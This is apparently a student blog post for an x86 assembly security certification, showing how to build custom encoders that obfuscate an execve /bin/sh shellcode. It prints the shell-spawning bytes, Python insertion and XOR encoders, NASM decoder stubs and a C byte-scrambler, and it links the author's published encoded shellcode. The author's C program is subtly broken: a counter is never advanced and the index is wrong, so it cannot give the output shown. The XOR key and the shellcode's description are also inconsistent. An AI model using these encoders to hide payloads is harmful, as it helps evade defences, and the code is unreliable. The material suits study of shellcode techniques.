Introduction
This is assignment #4 of the SLAE x86 Exam objectives.
Objectives
- Create a custom encoding scheme like the “Insertion Encoder” we showed you
- PoC with using execve-stack as the shellcode to encode with your schema and execute
Notice
At the time of writing this I already had a shellcode published on packetstorm and exploit-db which could serve as a solution to the exercise, but for completeness of this blog post and to avoid explaining the fstenv technique for clarity purposes.
Download:
[Exploit-db]
Linux/x86 – execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
[PacketStorm]
Linux/x86 execve /bin/sh Shellcode
70 bytes small Linux/x86 shellcode with XOR decoder stub and fstenv MMX FPU spawning a /bin/sh shell.
Building a task plan and prerequisites
Vivek provided the following python script to encode and decode shellcode values, respectively:
Insertion-Encoder.py:
#!/usr/bin/python
# Python Insertion Encoder
import random
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x%02x' % 0xAA
# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x'
encoded2 += '%02x,' %x
encoded2 += '0x%02x,' % 0xAA
# encoded2 += '0x%02x,' % random.randint(1,255)
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
insertion-decoder.nasm
; Filename: insertion-decoder.nasm
; Author: Vivek Ramachandran
; Website: http://securitytube.net
; Training: http://securitytube-training.com
;
;
; Purpose:
global _start
section .text
_start:
jmp short call_shellcode
decoder:
pop esi
lea edi, [esi +1]
xor eax, eax
mov al, 1
xor ebx, ebx
decode:
mov bl, byte [esi + eax]
xor bl, 0xaa
jnz short EncodedShellcode
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
add al, 2
jmp short decode
call_shellcode:
call decoder
EncodedShellcode: db 0x31,0xaa,0xc0,0xaa,0x50,0xaa,0x68,0xaa,0x2f,0xaa,0x2f,0xaa,0x73,0xaa,0x68,0xaa,0x68,0xaa,0x2f,0xaa,0x62,0xaa,0x69,0xaa,0x6e,0xaa,0x89,0xaa,0xe3,0xaa,0x50,0xaa,0x89,0xaa,0xe2,0xaa,0x53,0xaa,0x89,0xaa,0xe1,0xaa,0xb0,0xaa,0x0b,0xaa,0xcd,0xaa,0x80,0xaa, 0xbb, 0xbb
The insertion encoder by Vivek actually adds the 0xaa byte between each of the shellcode values, while my shellcode above actually has them xor‘d against the value 0x7d.
The code for the XOR Encoder is as following:
#!/usr/bin/python
# Python XOR Encoder
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode ...'
for x in bytearray(shellcode) :
# XOR Encoding
y = x^0xAA
encoded += '\\x'
encoded += '%02x' % y
encoded2 += '0x'
encoded2 += '%02x,' %y
print encoded
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
Then it gets decoded via the assembly as following:
...
decoder:
pop edi
lea esi, [edi +8]
xor ecx, ecx
mov cl, 4
...
call_decoder:
call decoder
decoder_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa
EncodedShellcode: db 0x9b,0x6a,0xfa,0xc2,0x85,0x85,0xd9,0xc2,0xc2,0x85,0xc8,0xc3,0xc4,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
In Vivek’s version of the decoder stub, using jmp-call-pop technique the value of decoder_value gets pushed into the stack, then we iterate through the EncoderShellcode 8 bytes a time and them xor the 8 bytes from teh shellcode against the value from decoder_value.
As my idea is to have somewhat of a shellcode scrambler, or at least that’s what I called it, and as it will be probably too complicated to explain all this at once, it will happen in stages. The overall idea is as following:
- Scramble / reposition each byte of the shellcode
- To accomplish this, we would also need to either:
- add an additional byte pointing to the offset for each pair repositioned, OR
- have a predefined pattern of where each-byte-goes-where
- To accomplish this, we would also need to either:
- Add an arithmetic instruction, like XOR
- Add an additional arithmetic instruction, like increment each byte by a provided value
The order in which the above tasks could be implemented could differ. As obviously the repositioning / scrambling of each byte is the hardest part of the exercise I decided to start with it and avoid having to debug the most complicated stuff at the end with additional encoding layer present.
The shellcode used for the purpose of the exercise will be the one spawning a /bin//sh execve shell as the exercise objective:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
However, to have an idea of what I am actually doing at the beginning I’ll use a simple pseudo-code pattern like \xAA\xBB\xCCxDD.
As the above code is 25 bytes in length, let’s use a pseudo-code up to the 25th letter:
0xAA,0xBB,0xCC,0xDD,0xEE,0xFF,0xGG,0xHH,0xII,0xJJ,0xKK,0xLL,0xMM,0xNN,0xOO,0xPP,0xQQ,0xRR,0xSS,0xTT,0xUU,0xVV,0xWW,0xXX,0xYY
Next to each shellcode byte, I will add another byte instruction containing the actual position of the original shellcode. So if \x31 is at the beginning of the shellcode, next to it I will add its offset, using 01 as the first one to avoid containing a null-byte.
0xAA,0x01, 0xBB, 0x02...
The execve shellcode becomes as following:
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Next to each byte, we add the strings from 1 to 25 in hex:
\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19
Of course this will make the size of the shellcode twice bigger, but as what we are trying to accomplish here is shellcode obfuscating and not aiming for a smaller buffer size we do not care about this.
The following C program will put the offsets as explained in a variable called shellcode_scrambled and output the result:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
unsigned char* shellcode = \
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
unsigned char* pos = \
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19";
void main()
{
unsigned char* shellcode_scrambled = (char*)malloc(strlen(shellcode)*2);
memset(shellcode_scrambled, 'a', strlen(shellcode)*2);
int i = 0, a = 0;
for (i, a; i < strlen(shellcode_scrambled); i+=2)
{
shellcode_scrambled[i] = shellcode[a];
shellcode_scrambled[i+1] = pos[i];
}
printf("\n");
for (i = 0; i < strlen(shellcode_scrambled); i++)
printf("\\x%.02x", shellcode_scrambled[i]);
}
The resulting shellcode:
\x31\x01\xc0\x02\x50\x03\x68\x04\x2f\x05\x2f\x06\x73\x07\x68\x08\x68\x09\x2f\x0a\x62\x0b\x69\x0c\x6e\x0d\x89\x0e\xe3\x0f\x50\x10\x89\x11\xe2\x12\x53\x13\x89\x14\xe1\x15\xb0\x16\x0b\x17\xcd\x18\x80\x19
Each byte has now its index appended, and we could scramble each 2 bytes in a totally random way. This is an additional task on its own, as we have to know which byte pair has been already used and which has not in order to keep the consistency of the shellcode.
*** [WORK IN PROGRESS] ***
Download
Bindshell (fstenv eip GetPC technique) Shellcode (70 bytes, xor encoded):
PacketStormSecurity:
https://packetstormsecurity.com/files/163057/Linux-x86-execve-bin-sh-Shellcode.html
Exploit-db:
https://www.exploit-db.com/shellcodes/49976
Github:
https://github.com/d7x/shellcode/blob/main/linux/mmx-xor-decoder_eip.c
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-34669